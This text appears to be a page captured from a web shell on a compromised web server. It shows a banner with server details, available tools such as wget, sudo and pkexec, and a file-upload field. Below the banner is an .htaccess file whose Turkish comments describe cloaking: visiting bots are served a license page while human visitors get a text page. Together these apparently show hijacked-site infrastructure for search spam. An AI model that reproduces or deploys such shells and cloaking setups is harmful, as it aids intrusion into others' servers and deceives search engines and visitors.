| Server IP : 18.193.92.211 / Your IP : 216.73.216.128 Web Server : Apache/2.4.63 (Ubuntu) System : Linux ip-10-0-0-90 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64 User : www-data ( 33) PHP Version : 8.2.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/delivery.darmas.de/public_html/ |
Upload File : |
# Medusa vitrin — harici domain YOK
# Cloaking YALNIZ index.php (bot→license | insan→TXT).
# license.html'e rewrite YOK: CF/CDN / URL'sini public cache'ler, insan da license görür.
DirectoryIndex index.php
<IfModule mod_authz_core.c>
Require all granted
</IfModule>
<IfModule mod_headers.c>
Header set Vary "User-Agent"
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
# Anasayfa → index.php (DirectoryIndex yetmezse)
RewriteRule ^$ index.php [L]
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>